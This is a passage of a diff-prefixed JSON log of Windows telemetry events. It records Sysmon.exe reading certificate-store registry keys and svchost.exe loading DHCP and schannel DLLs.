"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc6.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL", - "registry_value": "SCHANNEL", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "schannel.dll", - "image_path": "C:\\Windows\\System32\\schannel.dll", - "pid": 3980, - 